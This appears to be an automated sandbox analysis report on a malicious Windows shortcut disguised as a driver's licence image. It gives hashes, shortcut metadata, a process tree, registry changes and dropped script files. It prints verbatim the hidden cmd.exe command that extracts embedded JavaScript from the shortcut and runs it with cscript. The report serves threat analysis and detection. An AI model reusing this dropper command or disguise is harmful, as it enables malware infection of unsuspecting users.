File name: | Driv License Front.jpg.lnk |
Full analysis: | https://app.any.run/tasks/dfb2bac9-16a6-43f7-898c-85a2878d26ba |
Verdict: | Malicious activity |
Analysis date: | February 21, 2020, 16:42:38 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=2, Archive, ctime=Tue Feb 13 05:29:00 2018, mtime=Tue Feb 13 05:29:00 2018, atime=Tue Feb 13 05:29:00 2018, length=345088, window=hidenormalshowminimized |
MD5: | EB4827EA9184AFA13229E023C5F7148E |
SHA1: | 7555DCA670F25E977A250F1B5E1F49A1FE933750 |
SHA256: | BA7EF37927323C30C09A35D97625B85F20CC504A39C7D3886859762E1C26E111 |
SSDEEP: | 12288:nCrbIGrJnGcAZETsGb4VTbZXJbhmRMBjmE0qYf3YRHmWXQsA:nCrbzZGcASsGb4Vx5AYQuH70 |
.lnk | | | Windows Shortcut (100) |
---|
Flags: | IDList, RelativePath, CommandArgs, IconFile, Unicode, NoLinkInfo, ExpIcon, [16], TargetMetadata |
---|---|
FileAttributes: | Archive |
CreateDate: | 2018:02:13 07:29:00+01:00 |
AccessDate: | 2018:02:13 07:29:00+01:00 |
ModifyDate: | 2018:02:13 07:29:00+01:00 |
TargetFileSize: | 345088 |
IconIndex: | 2 |
RunWindow: | Show Minimized No Activate |
HotKey: | (none) |
TargetFileDOSName: | - |
RelativePath: | ..\..\..\..\..\..\Windows\System32\cmd.exe |
CommandLineArguments: | /c path=%windir%\system32&&move "Driv License Front.jpg.lnk " "%tmp%\1.lnk"&forfiles /P "%tmp%" /M "Driv*.lnk" /S /D 0 /C "%comspec% /c move @path %tmp%\1.lnk"&type "%tmp%\1.lnk"|find "TRU4">"%tmp%\0.js"|rd a||cSCripT "%tmp%\0.js" |
IconFileName: | C:\Program Files\Windows NT\Accessories\wordpad.exe |
MachineID: | admin-pc |
FillAttributes: | 0x07 |
PopupFillAttributes: | 0xf5 |
ScreenBufferSize: | 1 x 1 |
WindowSize: | 1 x 1 |
WindowOrigin: | 65532 x 65532 |
FontSize: | 8 x 12 |
FontFamily: | Modern |
FontWeight: | 400 |
FontName: | Terminal |
CursorSize: | 25 |
FullScreen: | No |
QuickEdit: | No |
InsertMode: | Yes |
WindowOriginAuto: | No |
HistoryBufferSize: | 50 |
NumHistoryBuffers: | 4 |
RemoveHistoryDuplicates: | No |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3976 | "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Driv License Front.jpg.lnk " "C:\Users\admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "Driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"&type "C:\Users\admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\admin\AppData\Local\Temp\0.js" | C:\Windows\System32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2656 | forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "Driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk" | C:\Windows\system32\forfiles.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ForFiles - Executes a command on selected files Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4056 | C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\admin\AppData\Local\Temp\1.lnk"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3376 | find "TRU4" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2548 | C:\Windows\system32\cmd.exe /S /D /c" rd a" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
272 | cSCripT "C:\Users\admin\AppData\Local\Temp\0.js" | C:\Windows\system32\cscript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2464 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2556 | "C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js | C:\Windows\System32\cscript.exe | — | cscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
4020 | "C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Local\Temp\reportapi.js | C:\Windows\System32\cscript.exe | — | cscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Version: 5.8.7600.16385 |
(PID) Process: | (272) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached |
Operation: | write | Name: | {FFE2A43C-56B9-4BF5-9A79-CC6D4285608A} {00000122-0000-0000-C000-000000000046} 0xFFFF |
Value: 01000000000000009452AEF7D5E8D501 | |||
(PID) Process: | (272) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication |
Operation: | write | Name: | Name |
Value: cscript.exe | |||
(PID) Process: | (2464) DllHost.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication |
Operation: | write | Name: | Name |
Value: DllHost.exe | |||
(PID) Process: | (272) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (272) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (2556) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (2556) cscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
272 | cscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js | text | |
MD5:C881308B66759F4A3DCCC1D2F1A741C0 | SHA256:A28445BE606336C46569D26AA34FD373960B3AF437FB84F68382E2A1BE386A3B | |||
3376 | find.exe | C:\Users\admin\AppData\Local\Temp\0.js | text | |
MD5:C881308B66759F4A3DCCC1D2F1A741C0 | SHA256:A28445BE606336C46569D26AA34FD373960B3AF437FB84F68382E2A1BE386A3B | |||
2556 | cscript.exe | C:\Users\admin\AppData\Local\Temp\reportapi.js | text | |
MD5:C881308B66759F4A3DCCC1D2F1A741C0 | SHA256:A28445BE606336C46569D26AA34FD373960B3AF437FB84F68382E2A1BE386A3B | |||
272 | cscript.exe | C:\Users\admin\AppData\Local\Temp\Driv License Front.jpg | image | |
MD5:8C23A1186E4ABAFE934832C7C581067C | SHA256:47512C1B6FF5144C15FC8473CD24994EFB74EEA9AB0387CB3BCB6B726D683773 | |||
3976 | cmd.exe | C:\Users\admin\AppData\Local\Temp\1.lnk | lnk | |
MD5:EB4827EA9184AFA13229E023C5F7148E | SHA256:BA7EF37927323C30C09A35D97625B85F20CC504A39C7D3886859762E1C26E111 |